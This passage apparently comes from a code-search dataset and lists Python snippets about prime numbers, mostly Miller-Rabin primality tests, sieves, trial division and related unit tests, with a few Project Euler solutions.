227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483, 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601, 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723, 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871, 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999, 2003, 2011, 2017, 2027, 2029, 2039, 2053, 2063, 2069, 2081, 2083, 2087, 2089, 2099, 2111, 2113,\n 2129, 2131, 2137, 2141, 2143, 2153, 2161, 2179, 2203, 2207, 2213, 2221, 2237, 2239, 2243, 2251, 2267,\n 2269, 2273, 2281, 2287, 2293, 2297, 2309, 2311, 2333, 2339, 2341, 2347, 2351, 2357, 2371, 2377, 2381,\n 2383, 2389, 2393, 2399, 2411, 2417, 2423, 2437, 2441, 2447, 2459, 2467, 2473, 2477, 2503, 2521, 2531,\n 2539, 2543, 2549, 2551, 2557, 2579, 2591, 2593, 2609, 2617, 2621, 2633, 2647, 2657, 2659, 2663, 2671,\n 2677, 2683, 2687, 2689, 2693, 2699, 2707, 2711, 2713, 2719, 2729, 2731, 2741, 2749, 2753, 2767, 2777,\n 2789, 2791, 2797, 2801, 2803, 2819, 2833, 2837, 2843, 2851, 2857, 2861, 2879, 2887, 2897, 2903, 2909,\n 2917, 2927, 2939, 2953, 2957, 2963, 2969, 2971, 2999, 3001, 3011, 3019, 3023, 3037, 3041, 3049, 3061,\n 3067, 3079, 3083, 3089, 3109, 3119, 3121, 3137, 3163, 3167, 3169, 3181, 3187, 3191, 3203, 3209, 3217,\n 3221, 3229, 3251, 3253, 3257, 3259, 3271, 3299, 3301, 3307, 3313, 3319, 3323, 3329, 3331, 3343, 3347,\n 3359, 3361, 3371, 3373, 3389, 3391, 3407, 3413, 3433, 3449, 3457, 3461, 3463, 3467, 3469, 3491, 3499,\n 3511, 
3517, 3527, 3529, 3533, 3539, 3541, 3547, 3557, 3559, 3571, 3581, 3583, 3593, 3607, 3613, 3617,\n 3623, 3631, 3637, 3643, 3659, 3671, 3673, 3677, 3691, 3697, 3701, 3709, 3719, 3727, 3733, 3739, 3761,\n 3767, 3769, 3779, 3793, 3797, 3803, 3821, 3823, 3833, 3847, 3851, 3853, 3863, 3877, 3881, 3889, 3907,\n 3911, 3917, 3919, 3923, 3929, 3931, 3943, 3947, 3967, 3989, 4001, 4003, 4007, 4013, 4019, 4021, 4027,\n 4049, 4051, 4057, 4073, 4079, 4091, 4093, 4099, 4111, 4127, 4129, 4133, 4139, 4153, 4157, 4159, 4177,\n 4201, 4211, 4217, 4219, 4229, 4231, 4241, 4243, 4253, 4259, 4261, 4271, 4273, 4283, 4289, 4297, 4327,\n 4337, 4339, 4349, 4357, 4363, 4373, 4391, 4397, 4409, 4421, 4423, 4441, 4447, 4451, 4457, 4463, 4481,\n 4483, 4493, 4507, 4513, 4517, 4519, 4523, 4547, 4549, 4561, 4567, 4583, 4591, 4597, 4603, 4621, 4637,\n 4639, 4643, 4649, 4651, 4657, 4663, 4673, 4679, 4691, 4703, 4721, 4723, 4729, 4733, 4751, 4759, 4783,\n 4787, 4789, 4793, 4799, 4801, 4813, 4817, 4831, 4861, 4871, 4877, 4889, 4903, 4909, 4919, 4931, 4933,\n 4937, 4943, 4951, 4957, 4967, 4969, 4973, 4987, 4993, 4999, 5003, 5009, 5011, 5021, 5023, 5039, 5051,\n 5059, 5077, 5081, 5087, 5099, 5101, 5107, 5113, 5119, 5147, 5153, 5167, 5171, 5179, 5189, 5197, 5209,\n 5227, 5231, 5233, 5237, 5261, 5273, 5279, 5281, 5297, 5303, 5309, 5323, 5333, 5347, 5351, 5381, 5387,\n 5393, 5399, 5407, 5413, 5417, 5419, 5431, 5437, 5441, 5443, 5449, 5471, 5477, 5479, 5483, 5501, 5503,\n 5507, 5519, 5521, 5527, 5531, 5557, 5563, 5569, 5573, 5581, 5591, 5623, 5639, 5641, 5647, 5651, 5653,\n 5657, 5659, 5669, 5683, 5689, 5693, 5701, 5711, 5717, 5737, 5741, 5743, 5749, 5779, 5783, 5791, 5801,\n 5807, 5813, 5821, 5827, 5839, 5843, 5849, 5851, 5857, 5861, 5867, 5869, 5879, 5881, 5897, 5903, 5923,\n 5927, 5939, 5953, 5981, 5987, 6007, 6011, 6029, 6037, 6043, 6047, 6053, 6067, 6073, 6079, 6089, 6091,\n 6101, 6113, 6121, 6131, 6133, 6143, 6151, 6163, 6173, 6197, 6199, 6203, 6211, 6217, 6221, 6229, 6247,\n 6257, 6263, 6269, 6271, 6277, 6287, 6299, 6301, 6311, 6317, 6323, 6329, 6337, 6343, 6353, 6359, 6361,\n 6367, 6373, 6379, 6389, 6397, 6421, 6427, 6449, 6451, 6469, 6473, 6481, 6491, 6521, 6529, 6547, 6551,\n 6553, 6563, 6569, 6571, 6577, 6581, 6599, 6607, 6619, 6637, 6653, 6659, 6661, 6673, 6679, 6689, 6691,\n 6701, 6703, 6709, 6719, 6733, 6737, 6761, 6763, 6779, 6781, 6791, 6793, 6803, 6823, 6827, 6829, 6833,\n 6841, 6857, 6863, 6869, 6871, 6883, 6899, 6907, 6911, 6917, 6947, 6949, 6959, 6961, 6967, 6971, 6977,\n 6983, 6991, 6997, 7001, 7013, 7019, 7027, 7039, 7043, 7057, 7069, 7079, 7103, 7109, 7121, 7127, 7129,\n 7151, 7159, 7177, 7187, 7193, 7207, 7211, 7213, 7219, 7229, 7237, 7243, 7247, 7253, 7283, 7297, 7307,\n 7309, 7321, 7331, 7333, 7349, 7351, 7369, 7393, 7411, 7417, 7433, 7451, 7457, 7459, 7477, 7481, 7487,\n 7489, 7499, 7507, 7517, 7523, 7529, 7537, 7541, 7547, 7549, 7559, 7561, 7573, 7577, 7583, 7589, 7591,\n 7603, 7607, 7621, 7639, 7643, 7649, 7669, 7673, 7681, 7687, 7691, 7699, 7703, 7717, 7723, 7727, 7741,\n 7753, 7757, 7759, 7789, 7793, 7817, 7823, 7829, 7841, 7853, 7867, 7873, 7877, 7879, 7883, 7901, 7907,\n 7919, 7927, 7933, 7937, 7949, 7951, 7963, 7993, 8009, 8011, 8017, 8039, 8053, 8059, 8069, 8081, 8087,\n 8089, 8093, 8101, 8111, 8117, 8123, 8147, 8161, 8167, 8171, 8179, 8191, 8209, 8219, 8221, 8231, 8233,\n 8237, 8243, 8263, 8269, 8273, 8287, 8291, 8293, 8297, 8311, 8317, 8329, 8353, 8363, 8369, 8377, 8387,\n 8389, 8419, 8423, 8429, 8431, 8443, 8447, 8461, 8467, 8501, 8513, 8521, 8527, 8537, 8539, 8543, 8563,\n 8573, 8581, 8597, 8599, 
8609, 8623, 8627, 8629, 8641, 8647, 8663, 8669, 8677, 8681, 8689, 8693, 8699,\n 8707, 8713, 8719, 8731, 8737, 8741, 8747, 8753, 8761, 8779, 8783, 8803, 8807, 8819, 8821, 8831, 8837,\n 8839, 8849, 8861, 8863, 8867, 8887, 8893, 8923, 8929, 8933, 8941, 8951, 8963, 8969, 8971, 8999, 9001,\n 9007, 9011, 9013, 9029, 9041, 9043, 9049, 9059, 9067, 9091, 9103, 9109, 9127, 9133, 9137, 9151, 9157,\n 9161, 9173, 9181, 9187, 9199, 9203, 9209, 9221, 9227, 9239, 9241, 9257, 9277, 9281, 9283, 9293, 9311,\n 9319, 9323, 9337, 9341, 9343, 9349, 9371, 9377, 9391, 9397, 9403, 9413, 9419, 9421, 9431, 9433, 9437,\n 9439, 9461, 9463, 9467, 9473, 9479, 9491, 9497, 9511, 9521, 9533, 9539, 9547, 9551, 9587, 9601, 9613,\n 9619, 9623, 9629, 9631, 9643, 9649, 9661, 9677, 9679, 9689, 9697, 9719, 9721, 9733, 9739, 9743, 9749,\n 9767, 9769, 9781, 9787, 9791, 9803, 9811, 9817, 9829, 9833, 9839, 9851, 9857, 9859, 9871, 9883, 9887,\n 9901, 9907, 9923, 9929, 9931, 9941, 9949, 9967, 9973]:\n if _n % p == 0:\n return _n == p\n if _n < 1E8: # Limit 1E8, because we have all primes below 1E4\n return True\n else:\n return None\n\n b = basic_is_prime(n)\n if b is not None:\n # Basic test gave answer\n return b\n\n m = n - 1\n s = 0\n while m % 2 == 0:\n s += 1\n m //= 2\n liars = set()\n\n def get_new_x():\n return random.randint(2, n - 1)\n\n while len(liars) < k:\n x = get_new_x()\n while x in liars:\n x = get_new_x()\n xi = pow(x, m, n)\n witness = True\n if xi == 1 or xi == n - 1:\n witness = False\n else:\n for __ in range(s - 1):\n xi = (xi ** 2) % n\n if xi == 1:\n return False\n elif xi == n - 1:\n witness = False\n break\n xi = (xi ** 2) % n\n if xi != 1:\n return False\n if witness:\n return False\n else:\n liars.add(x)\n return True", "def miller_rabin(n):\n assert(n >= 1)\n if n == 2:\n return True\n if n <= 1 or not n & 1:\n return False\n\n primes = [2, 3, 5, 7, 11, 13, 17, 19, 23]\n\n d = n - 1\n s = 0\n while not d & 1:\n d >>= 1\n s += 1\n\n for prime in primes:\n if prime >= n:\n continue\n x = pow(prime, d, n)\n if x == 1:\n continue\n for r in range(s):\n if x == n - 1:\n break\n if r + 1 == s:\n return False\n x = x * x % n\n return True", "def millerRabin(p, s=40):\n\n from ressources import config as conf\n\n if p in conf.COMMON_PRIMES:\n return True\n if not (p & 1): # n is a even number and can't be prime\n return False\n\n p1 = p - 1\n u = 0\n r = p1 # p-1 = 2**u * r\n\n while r % 2 == 0:\n r >>= 1\n u += 1\n\n # at this stage p-1 = 1 << u * r holds\n assert p - 1 == (1 << u) * r\n\n def witness(a):\n \"\"\"\n Returns:\n True, if there is a witness that p is not prime.\n False, when p might be prime\n \"\"\"\n z = square_and_multiply(a, r, p)\n if z == 1:\n return False\n\n for i in range(u):\n z = square_and_multiply(a, (1 << i) * r, p)\n if z == p1:\n return False\n return True\n\n for _ in range(s):\n a = random.randrange(2, p - 2)\n if witness(a):\n return False\n\n return True", "def is_miller_rabin_prime(n):\n if n <= 1:\n return False\n elif n == 2:\n return True\n elif n % 2 == 0:\n return False\n \n witnesses = get_witnesses(n)\n if witnesses is None:\n msg = 'No definite Miller-Rabin test is available for %d' % n\n raise ValueError(msg)\n \n d, s = factorN(n-1)\n for w in witnesses:\n if is_composite(w, n, d, s):\n return False\n \n return True", "def is_miller_rabin_prime(n):\n if n <= 1:\n return False\n elif n == 2:\n return True\n elif n % 2 == 0:\n return False\n \n witnesses = get_witnesses(n)\n if witnesses is None:\n msg = 'No definite Miller-Rabin test is available for %d' % n\n raise 
ValueError(msg)\n \n d, s = factorN(n-1)\n for w in witnesses:\n if is_composite(w, n, d, s):\n return False\n \n return True", "def miller_rabin(n, k=10):\n\tif n == 2:\n\t\treturn True\n\tif not n & 1:\n\t\treturn False\n\n\tdef temoin(a, s, d, n):\n\t\tx = pow(a, d, n)\n\t\tif x == 1:\n\t\t\treturn False\n\t\tfor i in range(s - 1):\n\t\t\tif x == n - 1:\n\t\t\t\treturn False\n\t\t\tx = pow(x, 2, n)\n\t\treturn x != n - 1\n\n\ts = 0\n\td = n - 1\n\n\twhile d % 2 == 0:\n\t\td >>= 1\n\t\ts += 1\n\n\tfor i in range(k):\n\t\ta = randrange(2, n - 1)\n\t\tif temoin(a, s, d, n):\n\t\t\treturn False\n\treturn True", "def millerRabin(n, r):\n\n if n < 2: # 0, 1 and negative numbers are considered not prime\n return False\n\n ############ CALCULATING d AND i #########\n # find the values d and i s.t. 2^i * d = n - 1\n d = n - 1\n i = 0\n\n while not d & 1:\n d >>= 1\n i += 1\n\n ############ TEST ONE WITNESS FOR EACH MR-ROUND #########\n for _ in range(r):\n\n # get random witness\n w = secrets.SystemRandom().randrange(2, n - 1)\n\n # use power-remainder method\n z = powerRemainder(w, d, n)\n\n # if z is 1 or n -1 then w is not a witness for n being a composite number\n if z not in (1, n - 1):\n\n # check no j s.t. (w^(2^j)) ^ d = -1 (mod n)\n for j in range(i):\n\n # get next z\n z = powerRemainder(w, 2 ** j * d, n)\n\n if z == 1: # n is definitely composite\n return False # return False\n elif z == n -1 : # n is prime or the witness is a strong liar\n break # break to next witness\n\n else:\n return False # if the inner loop didn't break, n is composite\n\n return True # if no witness can be found for n being composite, it is a probable prime", "def miller_rabin_pt(n, rounds):\n d = n - 1\n r = 0\n\n while d % 2 == 0:\n d >>= 1\n r += 1\n\n for _ in range(rounds):\n a = random.randint(2, n - 2)\n b = pow(a, d, n)\n if b == 1 or b == n - 1:\n continue\n for _ in range(r - 1):\n b = pow(b, 2, n)\n if b == n - 1:\n break\n else:\n return False\n\n return True", "def checks(candidate, primeList, r = 10):\n\n ############ 6k BASIC CHECK #########\n # all primes > 3 are of the form 6k + 1 or 6k -1 so skip testing any not of this form\n mod6 = candidate % 6\n\n if candidate > 3 and mod6 != 1 and mod6 != 5:\n return False # if check fails return False\n\n ############ TRIAL-DIVISION CHECK #########\n if not trialDivision(candidate, primeList):\n return False # if check fails return False\n\n ############ Miller-Rabin CHECK #########\n return millerRabin(candidate, r)", "def miller_rabin(n, k=50):\n if n < 6:\n return [ValueStatus(n,False), ValueStatus(n,False), ValueStatus(n,True), ValueStatus(n,True), ValueStatus(n,False), ValueStatus(n,True)][n]\n elif n & 1 == 0:\n return ValueStatus(n,False)\n s = 0\n d = n - 1\n while d % 2 == 0:\n s = s + 1\n d = d >> 1\n for t in range(k):\n a = randint(2, n-2)\n x = pow(a, d, n)\n if x == 1 or x == n-1:\n continue\n for _ in range(s-1):\n x = pow(x, 2, n)\n if x == 1:\n return ValueStatus(n,False,t=t)\n elif x == n - 1:\n a = 0\n break\n if a:\n return ValueStatus(n,False,t=t)\n return ValueStatus(n,True)", "def rabin_miller(n, target=128):\n ###############\n ## Start your code here\n return True\n ## End of your code\n ###############", "def rabinMillerPassed(mrc, rabin_miller_rounds):\n maxDivisionsByTwo = 0\n ec = mrc - 1\n while ec % 2 == 0:\n ec >>= 1\n maxDivisionsByTwo += 1\n assert (2 ** maxDivisionsByTwo * ec == mrc - 1)\n\n def trialComposite(round_tester):\n if pow(round_tester, ec, mrc) == 1:\n return False\n for i in range(maxDivisionsByTwo):\n if 
pow(round_tester, 2 ** i * ec, mrc) == mrc - 1:\n return False\n return True\n\n # Set number of trials here\n for i in range(rabin_miller_rounds):\n round_tester = random.randrange(2, mrc)\n if trialComposite(round_tester):\n return False\n return True", "def Pollard_pm1(n, primes, max_B=1000000):\n B = 10\n g = 1\n while B < max_B and g < n:\n a = randint(2, n - 2)\n g = gcd(a, n)\n if g != 1:\n return g\n for p in primes:\n if p >= B:\n break\n pd = 1 # p^d\n while pd * p <= B:\n pd *= p\n a = powmod(a, pd, n)\n g = gcd(a - 1, n)\n if g != 1 and g != n:\n return g\n B *= 2\n return 1", "def isprime(n):\n if n!=int(n):\n return False\n n=int(n)\n #Miller-Rabin test for prime\n if n==0 or n==1 or n==4 or n==6 or n==8 or n==9:\n return False\n\n if n==2 or n==3 or n==5 or n==7:\n return True\n s = 0\n d = n-1\n while d%2==0:\n d>>=1\n s+=1\n assert(2**s * d == n-1)\n\n def trial_composite(a):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True\n\n for i in range(8):#number of trials\n a = random.randrange(2, n)\n if trial_composite(a):\n return False\n\n return True", "def miller_rabin_base_2(n):\n d = n-1\n s = 0\n while not d & 1: # Check for divisibility by 2\n d = d >> 1 # Divide by 2 using a binary right shift\n s += 1\n\n x = pow(2, d, n)\n if x == 1 or x == n-1:\n return True\n for i in range(s-1):\n x = pow(x, 2, n)\n if x == 1:\n return False\n elif x == n - 1:\n return True\n return False", "def _miller_rabin_test(possible_prime: int, d: int) -> bool:\n a = random.randint(2, possible_prime - 2)\n adn = square_and_multiply(a, d, possible_prime)\n\n if adn == 1 or adn == possible_prime - 1:\n return True\n\n while d != possible_prime - 1:\n adn = square_and_multiply(adn, 2, possible_prime)\n d *= 2\n\n if adn == 1:\n return False\n\n if adn == possible_prime - 1:\n return True\n\n return False", "def miller_rabin_base_2(n):\n d, s = n - 1, 0\n while not d & 1:\n d, s = d >> 1, s + 1\n\n x = pow(2, d, n)\n if (x == 1) or (x == n - 1):\n return True\n\n for i in range(s - 1):\n x = pow(x, 2, n)\n if x == 1:\n return False\n elif x == n - 1:\n return True\n\n return False", "def test_primes_under_1000000(self):\n self.assertEqual(len(sieve(100)), 25)\n self.assertEqual(len(sieve(1000)), 168)\n self.assertEqual(len(sieve(10000)), 1229)\n self.assertEqual(len(sieve(100000)), 9592)\n self.assertEqual(len(sieve(1000000)), 78498)", "def gen_Primes(pp, K, Q, L):\r\n global MAX_PRIME\r\n global MAX_NUMBER\r\n global cnt_divisions\r\n global cnt_no_primes\r\n global cnt_compares\r\n global cnt_numbers\r\n global dict_P_runlen\r\n global dict_N_runlen\r\n # get the primes by testing the remainder\r\n # after division with formerly computed primes\r\n # stop when found square of prime greater current number\r\n cnt_divisions = 0\r\n cnt_no_primes = 0\r\n cnt_compares = 0\r\n cnt_numbers = 0\r\n X = gen_Numbers(0, L)\r\n # we already know some primes - skip them\r\n while True:\r\n x = next(X)\r\n if x >= pp: # also ignore pp - it's a square\r\n break # we are at the edge\r\n # now compare numbers revers against squares - think about roots\r\n # and test the remainder ...\r\n while True:\r\n x = next(X)\r\n if x > MAX_NUMBER:\r\n break\r\n cnt_numbers += 1\r\n prime_found = True # assume tha's a prime\r\n cnt_runlength = 0\r\n for p, q in zip(K, Q):\r\n cnt_compares += 1\r\n if q > x:\r\n # compare current x against the sqare of known primes\r\n # if gretaer than we need no more divisors from list\r\n break\r\n cnt_runlength 
+= 1\r\n cnt_divisions += 1\r\n if x % p == 0:\r\n # primitive test for a prime\r\n prime_found = False # wrong assumptions - get next x\r\n cnt_no_primes += 1\r\n break\r\n else:\r\n prime_found = False\r\n assert False, \"PrimeDivisorError/SquareRuleError\"\r\n if prime_found:\r\n # ok - we found one - also store new values for future compares\r\n K.append(x)\r\n Q.append(x*x)\r\n dict_P_runlen[cnt_runlength] = dict_P_runlen.get(\r\n cnt_runlength, 0) + 1\r\n yield x\r\n else:\r\n dict_N_runlen[cnt_runlength] = dict_N_runlen.get(\r\n cnt_runlength, 0) + 1\r\n return", "def is_prime(n):\n\n if n in CONSTANTS.LOW_PRIMES:\n return True\n\n for prime in CONSTANTS.LOW_PRIMES:\n if n % prime == 0:\n return False\n\n if n == 2:\n return True\n if n % 2 == 0:\n return False\n s = 0\n d = n - 1\n while d % 2 == 0:\n d //= 2\n s += 1\n for _ in range(CONSTANTS.MILLER_RABIN_ITERATIONS):\n a = random.randint(2, n - 2)\n x = pow(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(s - 1):\n x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True", "def is_prime(n, k=10):\n if n == 2 or n == 3:\n return True\n if not n & 1 or n < 2:\n return False\n m = n - 1\n s = 1\n d = m >> 1\n while not d & 1:\n s += 1\n d >>= 1\n for i in range(k):\n a = randint(2, n - 2)\n x = expmod(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for r in range(1, s):\n x = x * x % n\n if x == 1:\n return False\n if x == n - 1:\n break\n else:\n return False\n return True", "def test_prime_12(self):\n\t self.assertTrue(prime_generator(12), [2, 3, 5, 7, 11])", "def test_25(self):\n self.assertFalse(is_prime(25))", "def ll_primality(n: int) -> bool:\n if n <= 2 or not trial_div(n):\n return False\n luc_leh = lucas_lehmer()\n for _ in range(n - 1):\n ll = next(luc_leh)\n return ll % (2**n - 1) == 0", "def test_12():\n assert primes(12) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61]", "def test_15(self):\n\t self.assertTrue(prime_generator(15), [2, 3, 5, 7, 11, 13])", "def test_stress(self):\n primorial100 = 4711930799906184953162487834760260422020574773409675520188634839616415335845034221205289256705544681972439104097777157991804380284218315038719444943990492579030720635990538452312528339864352999310398481791730017201031090\n for i in range(10000):\n self.assertEqual(primorial(100), primorial100)", "def test_8(self):\n self.assertFalse(is_prime(8))", "def is_prime(n):\n assert n > 3\n k = int(log2(n))\n m = n - 1\n d = 0\n while(m % 2 == 0):\n m //= 2\n d += 1\n for _ in range(k):\n a = randint(2, n - 2)\n x = pow(a, m, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(d - 1):\n x = pow(x, 2, n)\n if x == 1:\n return 0\n if x == n - 1:\n break\n if x != n - 1:\n return 0\n return 1", "def test_prime_10(self):\n\t self.assertTrue(prime_generator(10), [2, 3, 5, 7])", "def miller_rabin(n, basis):\r\n # basis = generate_basis(b)\r\n if n == 2 or n == 3:\r\n return True\r\n\r\n if n % 2 == 0:\r\n return False\r\n\r\n r, s = 0, n - 1\r\n while s % 2 == 0:\r\n r += 1\r\n s //= 2\r\n for b in basis:\r\n x = pow(b, s, n)\r\n if x == 1 or x == n - 1:\r\n continue\r\n for _ in range(r - 1):\r\n x = pow(x, 2, n)\r\n if x == n - 1:\r\n break\r\n else:\r\n return False\r\n return True", "def is_prime(number, num_trials=200):\n if number < 2:\n return False\n if number != 2 and number % 2 == 0:\n return False\n\n # Find largest odd factor of n-1.\n exp = number - 1\n while exp % 2 == 0:\n exp //= 2\n\n for _ in range(num_trials):\n rand_val = 
int(random.SystemRandom().randrange(1, number))\n new_exp = exp\n power = pow(rand_val, new_exp, number)\n while new_exp != number - 1 and power != 1 and power != number - 1:\n power = (power * power) % number\n new_exp *= 2\n if power != number - 1 and new_exp % 2 == 0:\n return False\n\n return True", "def multiplicaciones(): #906609 tiene que darme\n ultimo_palindromo = 0\n total = 0\n for primer_numero in range(100, 1000):\n for segundo_numero in range(100, 1000):\n #total se encarga de hacer la multiplicacion entre los numeros\n total = primer_numero * segundo_numero\n # llamamos a la funcion que verifica si la multiplicacion que envia es un palindromo\n if obtener_palindromo(total):\n #luego de verificar que la multiplicacion era palindromo pasamos a evaluarla hasta llegar al ultimo palindromo\n #entre 100 y 1000\n if ultimo_palindromo < total:\n ultimo_palindromo = total\n return ultimo_palindromo", "def test_primes_under_10(self):\n self.assertEqual(sieve(10), [2, 3, 5, 7])\n self.assertEqual(sieve(100), [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31,\n 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97])", "def solution(n: int = 2000000) -> int:\n\n return sum(takewhile(lambda x: x < n, prime_generator()))", "def prjEuler():\r\n #Constants\r\n NUMSTRING = ( \"73167176531330624919225119674426574742355349194934\"\r\n \"96983520312774506326239578318016984801869478851843\"\r\n \"85861560789112949495459501737958331952853208805511\"\r\n \"12540698747158523863050715693290963295227443043557\"\r\n \"66896648950445244523161731856403098711121722383113\"\r\n \"62229893423380308135336276614282806444486645238749\"\r\n \"30358907296290491560440772390713810515859307960866\"\r\n \"70172427121883998797908792274921901699720888093776\"\r\n \"65727333001053367881220235421809751254540594752243\"\r\n \"52584907711670556013604839586446706324415722155397\"\r\n \"53697817977846174064955149290862569321978468622482\"\r\n \"83972241375657056057490261407972968652414535100474\"\r\n \"82166370484403199890008895243450658541227588666881\"\r\n \"16427171479924442928230863465674813919123162824586\"\r\n \"17866458359124566529476545682848912883142607690042\"\r\n \"24219022671055626321111109370544217506941658960408\"\r\n \"07198403850962455444362981230987879927244284909188\"\r\n \"84580156166097919133875499200524063689912560717606\"\r\n \"05886116467109405077541002256983155200055935729725\"\r\n \"71636269561882670428252483600823257530420752963450\" )\r\n \r\n #defined items\r\n greatest_prod = 1\r\n euler_queue = fiveQueue()\r\n \r\n #code\r\n for numIter in NUMSTRING:\r\n if( euler_queue.push( numIter ) ):\r\n temp_prod = euler_queue.product()\r\n if( temp_prod > greatest_prod ):\r\n greatest_prod = temp_prod\r\n \r\n print \"The greatest product is %d\" % greatest_prod\r\n return", "def isprime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def is_prime(n):\n return mr_prime(n)", "def prmn(n, l=2,primesDict = primesDict):\r\n if len(primesDict) <= 1:\r\n primesDict[2] = 1\r\n primesDict[3] = 2\r\n u = n\r\n psrt = 2\r\n while len(primesDict) <= u:\r\n if l > psrt**2:\r\n psrt = (l**0.5)\r\n\r\n for i in primesDict:\r\n if i > psrt:\r\n\r\n # store the last_value_in_dict:current_prime_no\r\n primesDict[l] = len(primesDict)+1\r\n break\r\n if l % i == 0:\r\n break\r\n l += 1\r\n primesDict[3] = 2", "def 
testprimes():\n\n # for integers a number 'p' is a prime:\n # if it is NOT divisible by any number larger than one, and less or equal\n # than the squareroot of 'p'\n\n # for polynomials, i assume i can do something like:\n # if it is NOT divisible by any polynomial of -order- larger than one, and less or equal\n # than the half the order of 'p'\n print(\"----- polynomials -----\")\n for a in range(1,1024):\n print(\"%4d:\" % a, end=\"\")\n foundsqrt = False\n a = BinaryPolynomial(a)\n for b in range(2, a.bits):\n b = BinaryPolynomial(b)\n q,r = divmod(a,b)\n print(1 if bool(r) else 0, end=\"\")\n if not foundsqrt and b.order()*2>a.order():\n print(end=\"/\")\n foundsqrt = True\n print()\n\n print(\"----- normal integers -----\")\n for a in range(1,1024):\n print(\"%4d:\" % a, end=\"\")\n foundsqrt = False\n for b in range(2, a):\n q,r = divmod(a,b)\n print(1 if bool(r) else 0, end=\"\")\n if not foundsqrt and b*b>a:\n print(end=\"/\")\n foundsqrt = True\n print()", "def isprime(n):\n if n == 2: return True\n if n == 3: return True\n if n % 2 == 0: return False\n if n % 3 == 0: return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def start_prime_test():", "def isPrime(p):\n for sp in smallprimes:\n if p == sp:\n return True\n if p % sp == 0:\n return False\n n_tries = 50\n s, m = decompose(p-1)\n while (n_tries > 0):\n n_tries -= 1\n a = random.randrange(2, p-2)\n x = myExp(a,m,p)\n if x == 1 or x == p-1: ##probably prime\n continue\n prime_flag = False\n for _ in range(1, s):\n x = myExp(x, 2, p)\n if x == 1: ## p is not prime\n return False\n elif x == p-1:\n prime_flag = True\n break\n if not prime_flag:\n return False\n return True", "def prjEuler():\r\n a = 1\r\n for a in range( 1, 1000 ):\r\n for b in range( 1, 1000 ):\r\n if( ( sqrt( ( a ** 2 ) + ( b ** 2 ) ) % 1 ) == 0 ):\r\n if( ( a + b + ( sqrt( ( a ** 2 ) + ( b ** 2 ) ) ) ) == 1000 ):\r\n print \"The product is %d\" % ( a * b * ( sqrt( ( a ** 2 ) + ( b ** 2 ) ) ) )\r\n return\r\n \r\n return", "def isprime(n):\n if n == 1:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def test_is_prime_invalid(self):\n sol = solution.Solution();\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n #self.assertFalse(sol.isPrime(864))", "def primenumbers(number, recurv, templist):\n for j in recurv:\n templist = [i for i in templist if i % j != 0]\n\n for x in templist:\n if not recurv:\n if number % x == 0:\n recurv.append(x)\n primenumbers(number, recurv, templist)\n if number % x == 0 and x > recurv[-1]:\n recurv.append(x)\n '''while tempnumber != 1 and tempnumber in recurv:\n if tempnumber % x == 0:\n tempnumber = number / x\n recurv.append(x)'''\n answer = functools.reduce(lambda x, y: x * y, recurv)\n print('answer:')\n print(answer)\n print(number)\n if answer == number:\n print('worked')\n break\n else:\n print('hi')\n primenumbers(number, recurv, templist)\n return recurv", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def premier(p: int) -> bool:\n if p < 2: return False\n k = 2\n while k**2 <= p:\n if p%k == 0:\n return 
